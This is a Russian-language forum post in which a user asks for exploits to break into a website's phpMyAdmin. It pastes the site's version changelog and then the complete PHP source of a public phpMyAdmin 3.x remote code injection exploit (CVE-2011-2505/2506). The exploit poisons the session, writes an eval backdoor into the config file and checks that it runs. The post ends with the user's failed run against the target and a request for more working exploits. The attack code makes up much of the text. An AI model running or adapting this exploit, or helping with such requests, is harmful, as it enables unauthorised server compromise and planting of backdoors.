сплойт под phpmyadmin Доброго времени суток. Мучаюсь над phpmyadmin. Не откажите в любезности, пожалуйста, посоветовать эксплойт для этого phpmyadmin (или несколько, которые подойдут). Сам поискал. Вроде ничего(( Скрин со сканера. Файл http://www.siteexample.com/phpmyadmin/changelog.php Code: phpMyAdmin - ChangeLog ---------------------- phpMyAdmin - ChangeLog ---------------------- $Id$ $HeadURL: https://phpmyadmin.svn.sourceforge.net/svnroot/phpmyadmin/trunk/phpMyAdmin/ChangeLog $ 3.3.7.0 (2010-09-07) - patch #3050492 [PDF scratchboard] Cannot drag table box to the edge after a page size increase, thanks to Martin Schönberger - bug #3054458 [core] Fixed displaying number of rows. - bug #3035300 [parser] Fixed wrong definition of keywords. - [setup] Fixed escaping of server name. 3.3.6.0 (2010-08-28) - bug #3033063 [core] Navi gets wrong db name - bug #3031705 [core] Fix generating condition for real numbers by comparing them to string. - bug #3034026 [confirmation] TRUNCATE queries get no confirmation request - bug #3036132 [core] Triggers not fetched if dbname has an hyphen - patch #3039269 [dbi] Wrong variable checked for nopassword option, thanks to Will Palmer - bug #3040226 [XHTML] LockFromUpdate checkbox not checked by default - bug [doc] Withdraw or edit FAQ entries related to older MySQL or PHP - bug #3042706 [pmadb] Relations, bookmarks, etc deleted after table drop - bug #3044189 [doc] Cleared documentation for hide_db. - bug #3042495 [core] Move PMA_sendHeaderLocation to core.lib.php. 3.3.5.1 (2010-08-20) - [core] Fixed various XSS issues, see PMASA-2010-5 for more details. 3.3.5.0 (2010-07-26) - patch #2932113 [information_schema] Slow export when having lots of databases, thanks to Stéphane Pontier - bug #3022705 [import] Import button does not work in Catalan when there is no progress bar possible - bug [replication] Do not offer information_schema in the list of databases - bug [js] Avoid loading twice a js file - bug #3024344 [setup] Setup forces numeric MemoryLimit - bug #3025975 [auth] Odd LoginCookieValidity default value - bug #3026400 [PHP] ereg functions are deprecated - bug #3027557 [PHP] split() deprecated in PHP 5.3 (backport fixes from master) - bug #3023507 [core] No result set display from stored procedure SELECT - bug [export] CSV for MS Excel (Windows) should have semi-colon as separator - [core] Update library PHPExcel to version 1.7.3c - bug #2994885, bug #3029168 [import] Convert Excel column name correctly - bug [scripts] MySQL 5.5.5 does not accept TIMESTAMP(14) in create_tables.sql 3.3.4.0 (2010-06-28) - bug #2996161 [import] properly escape import value - bug #2998889 [import] Import button does not work in Catalan - [browse] Fix handling of sort order if only column is specified. + [lang] Greek update, thanks to Panagiotis Papazoglou + [lang] Updated lot of translation based on work done in master branch. - bug #3008411 [databases] Last dropped database remains active in navi - bug #2986383 [parser] Not all data being shown / counted - bug [synchronize] Rows were deleted in target table regardless of the "Would you like to delete..." option - bug [privileges] List of tables not shown when the db name has a wildcard - bug #3011126 [display] Edit link missing after long query - patch #3013264 [doc] FAQ 1.40 uses a comma instead of a period, thanks to Isaac Bennetch - [engines] Fix getting InnoDB status. - bug #2986422 [import] Results for query are not displayed 3.3.3.0 (2010-05-10) - patch #2982480 [navi] Do not group if there would be one table in group, thanks to Lorikeet Lee. - patch #2983492 [sync] When asking to synchronize Structure and Data, only Structure is done, thanks to Ankit Gupta - patch #2984893 [engines] InnoDB storage page emits a warning, thanks to Madhura Jayaratne - bug #2974687, bug #2974692 [compatibility] PHPExcel : IBM AIX iconv() does not work, thanks to Björn Wiberg - bug #2983066 [interface] Flush table on table operations shows the query twice, thanks to Martynas Mickevičius - bug #2983060, patch #2987900 [interface] Fix initial state of tables in designer, thanks to Sutharshan Balachandren. - bug #2983062, patch #2989408 [engines] Fix warnings when changing table engine to Maria, thanks to Madhura Jayaratne. - bug #2974067 [display] non-binary fields shown as hex - bug #2983065 [operations] Error when changing from Maria to MyISAM engine - bug #2975408 [tracking] Data too long for column data_sql - bug [tracking] Tracking report should obey MaxCharactersInDisplayedSQL - bug [edit] Avoid selecting UNHEX function by default for a BLOB column for which editing is protected - bug #2994168 [structure] Show auto_increment in uppercase - bug #2993970 [pdf schema] Page numbering in Table of Contents 3.3.2.0 (2010-04-13) - patch #2969449 [core] Name for MERGE engine varies depending on the MySQL version, thanks to Dieter Adriaenssens - bug #2966078 [browse] Incorrect LIMIT is saved and sticks while browsing - bug #2967366 [Structure] Some results of Propose table structure are shown in hex - bug #2967565 [insert] UNHEX not selected by default when inserting BINARY - [navi] Changed link to git repository on main page - bug #2972232 [menu] Import menu tab not present on main page - patch #2976790 [menu] Go to the upper level after table DROP, thanks to Kaarel Nummert - patch #2978815 [pdf] Fix generating PDF with table dimensions, thanks to BlinK_ - patch #2977725 [export] XML wrongly encoded, thanks to Victor Volkov - patch #2979234 [import] Create tables with current charset and collation. - patch #2979234, bug #2960105 [import] Properly import unicode text from ODS. - bug #2973280 [export] Proper handling of temporary directory in XLS export. - bug #2980582 [interface] Properly format server status parameter. - bug #2973949 [session] SQL History broken (revert patch #2899969), thanks to Dieter Adriaenssens - [doc] Be more specific about problems with Suhosin. 3.3.1.0 (2010-03-16) - bug #2941037 [core] Database structure not sorted by table correctly - bug #2948492 [interface] Slide effect masks some fields on search page - bug #2959746 [interface] Unknown table status: TABLE_TYPE - bug #2953050 [export] export VIEW as SQL includes INSERT statement - bug #2942032 [core] Cannot detect PmaAbsoluteUri correctly on Windows - bug #2961609 [auth] Potential information disclosure at login page - patch #2961540 [export] Do not export data of MERGE table, thanks to Dieter Adriaenssens - bug #2961198 [parser] Querying a table named "data" - bug #2931429 [structure] Editing long triggers - bug #2970769 [structure] Incorrect reference to mootools-more.js 3.3.0.0 (2010-03-07) + RFE #2308632 [edit] Use hex for (var)binary fields, thanks to Maarten Dieleman + patch #2794819 [navi] Filter for displayed table names, thanks to Michael Valushko - bug #2794840 [core] Cannot redeclare pma_tableheader() - RFE #2726479 [core] configurable maximal length of URL + patch #2724755 [display] Full/partial text links (big T) are back, thanks to nullbarriere - bug [display] handle NavigationBarIconic as documented for navi buttons + RFE #2726479 [export] Export tables preselect + patch #2805828 [export] PHP array export plugin, thanks to Geoffray Warnants + patch #2798592 [import] Progress bar, thanks to Tomas Srnka - bug [gui] Generate Password not working for 'Change Login Information', only for 'Change password' + [lang] Arabic update, thanks to Meno25 + RFE #2822190 [structure] BOOLEAN is standard SQL + [lang] German update, thanks to knittl + [lang] German update, thanks to virsacer + RFE #2813867 [structure] Default sorting order in list of tables + [import] Added MySQL type-detection functionality to import library, thanks to Derek Schaefer + [import] Added ODS, Excel XLS, Excel XLSX, and XML import modules, thanks to Derek Schaefer + [export] Added Excel XLSX export module, thanks to Derek Schaefer + [core] Added ability for tracking changes made through phpMyAdmin + RFE #2839504 [engines] Support InnoDB plugin's new row formats + [core] Added ability for synchronizing databases among servers. + [lang] bug #2843101 Dutch update, thanks to scavenger2008 + [lang] Galician update, thanks to Xosé Calvo + [export] Added MediaWiki export module, thanks to Derek Schaefer + [lang] Turkish update, thanks to Burak Yavuz + [auth] Add custom port configuration in signon, thanks to Gary Smith - [core] Removed context from the error handler - bug #2883633 [export] Export of InnoDB table is incomplete + RFE #2862575 [status] Order query statistics by % desc, skip rows with 0 + RFE #2823686 [interface] Increase default height of query window + RFE #2129902 [structure] Don't hide indexes + patch #2812070 [interface] Allow selecting a range of rows by holding shift, thanks to Joolee + [lang] Russian update, thanks to Victor Volkov + [lang] Greek update, thanks to Panagiotis Papazoglou + [lang] Norwegian update, thanks to Sven-Erik Andersen - bug #2929958 [import] Cannot import (French interface) - [security] Use X-Frame-Options header to protect against ClickJacking. + [lang] Finnish update, thanks to Jouni Kahkonen + [lang] Lithuanian update, thanks to Rytis Slatkevicius - bug #2931939 [status] Seeing "m" as unit is confusing - bug #2926613 [edit] Copy database shows errors when DB has foreign key + [lang] Catalan update, thanks to Xavier Navarro 3.2.6.0 (not released) - bug #2938492 [display] information_schema sorting order - bug #2941101 [import] import timeout when table already created and several data lines - bug #2944069 [config] Extraneus dot from dirname() when installed in root, thanks to ayanamist 3.2.5.0 (2010-01-10) - patch #2903400 [bookmarks] Status of bookmark table, thanks to Virsacer - bug [history] QueryHistoryDB is not respected - bug #2905629 [auth] Blowfish secret is not hashed - bug #2910000 [gui] ShowServerInfo should hide all server info from main page - bug #2910568 [structure] Table size for ARCHIVE tables is not displayed - patch #2899969 [core] Session lock blocks working from a second window, thanks to Greg Roach - patch #2915168 [import] Incorrect parsing of DELIMITER keyword, thanks to Greg Roach - patch #2918831 [export] Missing backquotes on reserved words, thanks to Virsacer - [core] Fix broken cleanup of $_GET - bug #2924357 [operations] Cannot rename a database that has foreign key constraints - bug #869006 [structure] Ignore number of records for MRG_MyISAM tables - bug [browse] "Show BLOB contents" should display HTML code that is present in a BLOB, thanks to Vincent van der Tuin - [privileges] Improve escaping of hostname --- Older ChangeLogs can be found on our project website --- http://www.phpmyadmin.net/old-stuff/ChangeLogs/ # vim: et ts=4 sw=4 sts=4 # vim: ft=changelog fenc=utf-8 encoding=utf-8 # vim: fde=getline(v\:lnum-1)=~'^\\s*$'&&getline(v\:lnum)=~'\\S'?'>1'\:1&&v\:lnum>8&&getline(v\:lnum)!~'^#' # vim: fdn=1 fdm=expr
Вот единственный сплойт, который вроде как должен подойти. http://en.securitylab.ru/nvd/409329.php Code: <?php /* # Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit # Date: 2011-07-09 # Author: Mango of ha.xxor.se # Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 # CVE : CVE-2011-2505, CVE-2011-2506 # Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt # Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html */ echo php_sapi_name()!=='cli'?'<pre>':'';?> . , )\ . . ,/) , / ) , )\ )\( /)/( (__( /( / ) __ __ ________ __ __ / \ ( )| |) \ / | |\ /| | | | | | | | (__) ( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | | | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__| ==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] Remote Code Injection [] [][] [] [] [] [] [] [] http://ha.xxor.se [][] [] [] [] [][] [][] [] [] _ _ ___ __ ____ __ ___ ___ | |-| || _ |\ /\ /| _ || ) |_|-|_||_|_|/_._\/_._\|___||_|_\ ___ ___ ___ _ _ ___ ___ __ __ ( < | [_ / /| || || )(_)| |\ | / >__)|_[_ \__\|____||_|_\|_| |_| |_| Use responsibly. <?php echo php_sapi_name()!=='cli'?'</pre>':''; if(php_sapi_name()==='cli'){ if(!isset($argv[1])){ output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2"); killme(); } $pmaurl = $argv[1]; }else{ $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:''; } $code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);'; $cookie = null; $token = null; if(!function_exists('curl_init')){ output('[!] Fatal error. Need cURL!'); killme(); } $ch = curl_init(); $debug = 0; if(php_sapi_name()!=='cli'){ ?> <form method=post> URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: /phpMyAdmin-3.3.9.2<br/> <input name=submit type=submit value=?> </form> <pre> <?php if(!isset($_REQUEST['submit']))killme(true); } output("[i] Running..."); // Start a session and get a token curl_setopt_array($ch, array( CURLOPT_URL => $pmaurl.'/setup/index.php', CURLOPT_HEADER => 1, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false )); output("[*] Contacting server to retrive session cookie and token."); $result = curl_exec($ch); if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url."); killme(); } if(!$result){ output("[!] cURL error:".curl_error($ch)); killme(); } if(false !== strpos($result, 'Cannot load or save configuration')){ output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist."); killme(); } // Extract cookie preg_match('/phpMyAdmin=([^;]+)/', $result, $matches); $cookie = $matches[1]; output("[i] Cookie:".$cookie); // Extract token preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches); $token = $matches[2]; output("[i] Token:".$token); // Poison _SESSION variable curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token); curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie); output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); // Save file curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token); output("[*] Contacting server to make it save the injected code to a file."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);'); curl_setopt($ch, CURLOPT_POST, 0); output("[*] Contacting server to test if the injected code executes."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!"); output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';"); }else{ output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable."); } curl_close($ch); function output($msg){ echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n"; flush(); } function killme(){ output("[*] Exiting..."); echo php_sapi_name()!=='cli'?'<pre>':''; die(); } echo php_sapi_name()!=='cli'?'<pre>':'';?> Залил на сервер. Открыл. Втавил линк http://www.siteexample.com:80/phpmyadmin И получил ответ: Code: [i] Running... [*] Contacting server to retrive session cookie and token. [i] Cookie: [i] Token: [*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array. [*] Contacting server to make it save the injected code to a file. [*] Contacting server to test if the injected code executes. [!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable. Вопросы: 1. Я посмотрел сплойт. Ничего не менял. Если там ошибки? 2. По идеи сплойт должен сработать. В чем причина, что он не работает или что я делаю не так? 3. Посоветуйте еще подходящие сплойты.